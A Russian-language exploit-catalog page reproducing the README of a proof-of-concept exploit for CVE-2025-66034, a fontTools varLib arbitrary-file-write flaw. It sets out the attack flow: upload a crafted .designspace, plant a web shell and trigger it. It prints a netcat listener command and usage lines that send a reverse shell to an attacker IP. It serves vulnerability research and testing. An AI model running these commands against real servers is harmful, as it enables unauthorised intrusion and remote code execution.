Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
varlib-cve-2025-66034 — Эксплойт типа proof-of-concept для CVE-2025-66034 в конвейере генерации вариативных шрифтов fontTools. Специально подготовленный файл `.designspace` позволяет управлять путём вывода, что даёт возможность произвольной записи файлов. Скрипт автоматизирует создание полезной нагрузки, генерацию шрифта и загрузку для демонстрации проблемы. | Kitploit
Инструменты/GitHubGitHub/symphony2colour/varlib-cve-2025-66034
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubsymphony2colour/varlib-cve-2025-66034

varlib-cve-2025-66034

Репозиторий
2121 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Эксплойт типа proof-of-concept для CVE-2025-66034 в конвейере генерации вариативных шрифтов fontTools. Специально подготовленный файл `.designspace` позволяет управлять путём вывода, что даёт возможность произвольной записи файлов. Скрипт автоматизирует создание полезной нагрузки, генерацию шрифта и загрузку для демонстрации проблемы.

Поделиться

Эксплойт для CVE-2025-66034 в fontTools varLib

cve component vulnerability vector impact language dependency license

Этот репозиторий не представляет собой новую уязвимость.

Это Proof-of-concept эксплойт для CVE-2025-66034, затрагивающий конвейер генерации вариативных шрифтов fontTools varLib.

Уязвимость позволяет злоумышленникам контролировать имя выходного файла внутри специально созданного файла .designspace. При обработке уязвимым сервисом генерации шрифтов это может привести к произвольной записи файлов в файловой системе сервера.

Скрипт varlib_cve_2025_66034.py автоматизирует создание полезной нагрузки, генерацию шрифтов, загрузку и опциональный запуск шелла.


Возможности

  • Автоматическое создание совместимых мастер-шрифтов с помощью fontTools
  • Генерация случайного имени файла шелла
  • Настраиваемый целевой путь и конечная точка загрузки
  • Автоматический слушатель nc
  • Не требуется ручная подготовка шрифтов

Требования

Python 3.9+

Установка зависимостей:

pip install fonttools requests

Для слушателя требуется Netcat, поэтому следующая команда необходима, если вы используете опцию --no-listen:

nc -lvnp <PORT_NUMBER>

Использование

Если ваша цель — локальная лаборатория на mysite.com, а путь загрузки, путь записи в файловую систему и веб-доступный путь запуска совпадают со значениями по умолчанию в скрипте, вы можете запустить его напрямую.

Базовое использование:

python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT>

Весьма вероятно, что цель использует другие URL-адреса или пути в файловой системе. Переопределите значения по умолчанию с помощью доступных опций ниже, таких как --url, --path и --trigger, или измените скрипт вручную.

Примечание: имена полей multipart-формы могут различаться в зависимости от окружения. Если цель не использует те же имена полей формы, что и скрипт, настройте их в разделе files перед запуском эксплойта.

Опции

АргументОписание
--ipIP-адрес слушателя атакующего
--portПорт слушателя
--pathПуть в файловой системе цели, куда будет записан файл (должен быть веб-доступным для запуска веб-шелла)
--urlКонечная точка загрузки, форма может различаться
--triggerБазовый URL для запуска записанной полезной нагрузки после загрузки
--no-listenОтключить автоматический слушатель netcat

Пример с пользовательскими опциями:

python varlib_cve_2025_66034.py --ip <ATTACKER_IP> --port <ATTACKER_PORT> --path /var/www/mysite.com/public --url http://mysite.com/tools/variable-font-generator/process --trigger http://mysite.com

Порядок работы эксплойта

  1. Создание совместимых мастер-шрифтов
  2. Создание вредоносного файла .designspace
  3. Загрузка полезной нагрузки через multipart POST
  4. Запись произвольного файла на сервере
  5. Запуск полезной нагрузки через HTTP-запрос

Благодарности / Признательность

Особая благодарность и уважение:

  • Мейнтейнерам и участникам проекта fontTools за их работу над библиотекой fontTools с открытым исходным кодом.
  • Исследователям безопасности, которые обнаружили и ответственно раскрыли CVE-2025-66034.
  • Сообществу специалистов по открытому коду в области безопасности за документирование и анализ уязвимостей, которые помогают повышать безопасность программного обеспечения.

Этот proof-of-concept предоставлен в образовательных и исследовательских целях, чтобы помочь понять уязвимость и её влияние.


Отказ от ответственности

Этот код предоставлен только в образовательных и исследовательских целях.

Не используйте этот эксплойт против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.

Автор не несёт ответственности за неправомерное использование или ущерб, причинённый этим программным обеспечением.


Ссылки

  • Сведения о CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-66034
  • Уведомление GitHub: https://github.com/advisories/GHSA-768j-98cg-p3fv
  • Проект fontTools: https://github.com/fonttools/fonttools
  • Документация fontTools: https://fonttools.readthedocs.io/
Скачать инструмент